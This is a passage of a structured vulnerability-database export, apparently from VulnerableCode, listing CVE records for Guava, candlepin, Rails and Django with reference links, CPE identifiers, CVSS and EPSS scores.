value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
93
reference_url http://www.securitytracker.com/id/1041707
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.securitytracker.com/id/1041707
94
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1573391
reference_id 1573391
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1573391
95
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:google:guava:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:google:guava:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:google:guava:*:*:*:*:*:*:*:*
96
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_payments:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_payments:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_payments:*:*:*:*:*:*:*:*
97
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_ip_service_activator:7.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_ip_service_activator:7.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_ip_service_activator:7.3.0:*:*:*:*:*:*:*
98
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*
99
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*
100
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:database_server:12.2.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:database_server:12.2.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:database_server:12.2.0.1:*:*:*:*:*:*:*
101
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:database_server:18c:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:database_server:18c:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:database_server:18c:*:*:*:*:*:*:*
102
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:database_server:19c:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:database_server:19c:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:database_server:19c:*:*:*:*:*:*:*
103
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*
104
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*
105
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*
106
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*
107
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:14.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_investor_servicing:14.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_investor_servicing:14.1.0:*:*:*:*:*:*:*
108
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.0.0:*:*:*:*:*:*:*
109
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*
110
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*
111
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*
112
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
113
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
114
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
115
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*
116
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
117
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*
118
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.4.0:*:*:*:*:*:*:*
119
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.1.0:*:*:*:*:*:*:*
120
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*
121
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*
122
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:openstack:13:*:*:*:*:*:*:*
123
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
124
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite_capsule:6.4:*:*:*:*:*:*:*
125
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization:4.0:*:*:*:*:*:*:*
126
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization:4.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:virtualization:4.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization:4.2:*:*:*:*:*:*:*
127
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:virtualization_host:4.0:*:*:*:*:*:*:*
128
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*
129
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*
130
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
131
reference_url https://github.com/google/guava/wiki/CVE-2018-10237
reference_id CVE-2018-10237
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/google/guava/wiki/CVE-2018-10237
132
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-10237
reference_id CVE-2018-10237
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:N/I:N/A:P
1
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-10237
133
reference_url https://github.com/advisories/GHSA-mvr2-9pj6-7w5j
reference_id GHSA-mvr2-9pj6-7w5j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mvr2-9pj6-7w5j
134
reference_url https://access.redhat.com/errata/RHSA-2020:2562
reference_id RHSA-2020:2562
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2562
fixed_packages
aliases CVE-2018-10237, GHSA-mvr2-9pj6-7w5j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kwyu-yq4w-kqe4
47
url VCID-m29v-624x-kkha
vulnerability_id VCID-m29v-624x-kkha
summary candlepin: credentials exposure through log files
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:1222
reference_id
reference_type
scores
url https://access.redhat.com/errata/RHSA-2019:1222
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-3891.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-3891.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-3891
reference_id
reference_type
scores
0
value 0.00042
scoring_system epss
scoring_elements 0.128
published_at 2026-04-01T12:55:00Z
1
value 0.00042
scoring_system epss
scoring_elements 0.12766
published_at 2026-04-13T12:55:00Z
2
value 0.00042
scoring_system epss
scoring_elements 0.12883
published_at 2026-04-09T12:55:00Z
3
value 0.00042
scoring_system epss
scoring_elements 0.12849
published_at 2026-04-11T12:55:00Z
4
value 0.00042
scoring_system epss
scoring_elements 0.1281
published_at 2026-04-12T12:55:00Z
5
value 0.00042
scoring_system epss
scoring_elements 0.12898
published_at 2026-04-02T12:55:00Z
6
value 0.00042
scoring_system epss
scoring_elements 0.12949
published_at 2026-04-04T12:55:00Z
7
value 0.00042
scoring_system epss
scoring_elements 0.12752
published_at 2026-04-07T12:55:00Z
8
value 0.00042
scoring_system epss
scoring_elements 0.12832
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-3891
3
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3891
reference_id
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3891
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1693867
reference_id 1693867
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1693867
5
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:satellite:6.4:*:*:*:*:*:*:*
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-3891
reference_id CVE-2019-3891
reference_type
scores
0
value 2.1
scoring_system cvssv2
scoring_elements AV:L/AC:L/Au:N/C:P/I:N/A:N
1
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
2
value 7.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
url https://nvd.nist.gov/vuln/detail/CVE-2019-3891
fixed_packages
aliases CVE-2019-3891
risk_score 3.5
exploitability 0.5
weighted_severity 7.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-m29v-624x-kkha
48
url VCID-mnkw-23eu-bkgc
vulnerability_id VCID-mnkw-23eu-bkgc
summary 
Ability to forge per-form CSRF tokens in Rails
It is possible to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token for any action for that session.

Impact
------

Given the ability to extract the global CSRF token, an attacker would be able to construct a per-form CSRF token for that session.

Workarounds
-----------

This is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8166.json
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-8166.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-8166
reference_id
reference_type
scores
0
value 0.00443
scoring_system epss
scoring_elements 0.63311
published_at 2026-04-13T12:55:00Z
1
value 0.00443
scoring_system epss
scoring_elements 0.63348
published_at 2026-04-12T12:55:00Z
2
value 0.00443
scoring_system epss
scoring_elements 0.63364
published_at 2026-04-11T12:55:00Z
3
value 0.00443
scoring_system epss
scoring_elements 0.63347
published_at 2026-04-09T12:55:00Z
4
value 0.00443
scoring_system epss
scoring_elements 0.63329
published_at 2026-04-08T12:55:00Z
5
value 0.00443
scoring_system epss
scoring_elements 0.63278
published_at 2026-04-07T12:55:00Z
6
value 0.00443
scoring_system epss
scoring_elements 0.63312
published_at 2026-04-04T12:55:00Z
7
value 0.00443
scoring_system epss
scoring_elements 0.63284
published_at 2026-04-02T12:55:00Z
8
value 0.00443
scoring_system epss
scoring_elements 0.63225
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-8166
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15169
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8162
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8164
5
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
6
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8166
7
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8167
8
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
9
reference_url https://github.com/rails/rails
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rails/rails
10
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8166.yml
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2020-8166.yml
11
reference_url https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3
scoring_elements
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://groups.google.com/forum/#!topic/rubyonrails-security/NOjKiGeXUgw
12
reference_url https://groups.google.com/g/rubyonrails-security/c/NOjKiGeXUgw
reference_id
reference_type
scores
url https://groups.google.com/g/rubyonrails-security/c/NOjKiGeXUgw
13
reference_url https://hackerone.com/reports/732415
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://hackerone.com/reports/732415
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-8166
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-8166
15
reference_url https://www.debian.org/security/2020/dsa-4766
reference_id
reference_type
scores
url https://www.debian.org/security/2020/dsa-4766
16
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1843152
reference_id 1843152
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1843152
17
reference_url https://github.com/advisories/GHSA-jp5v-5gx4-jmj9
reference_id GHSA-jp5v-5gx4-jmj9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jp5v-5gx4-jmj9
18
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
fixed_packages
aliases CVE-2020-8166, GHSA-jp5v-5gx4-jmj9
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mnkw-23eu-bkgc
49
url VCID-mv1p-yxvp-pbh6
vulnerability_id VCID-mv1p-yxvp-pbh6
summary An issue was discovered in Django 2.0 before 2.0.3, 1.11 before 1.11.11, and 1.8 before 1.8.19. The django.utils.html.urlize() function was extremely slow to evaluate certain inputs due to catastrophic backtracking vulnerabilities in two regular expressions (only one regular expression for Django 1.8.x). The urlize() function is used to implement the urlize and urlizetrunc template filters, which were thus vulnerable.
references
0
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
1
reference_url https://access.redhat.com/errata/RHSA-2019:0051
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0051
2
reference_url https://access.redhat.com/errata/RHSA-2019:0082
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:0082
3
reference_url https://access.redhat.com/errata/RHSA-2019:0265
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 6.9
scoring_system cvssv4
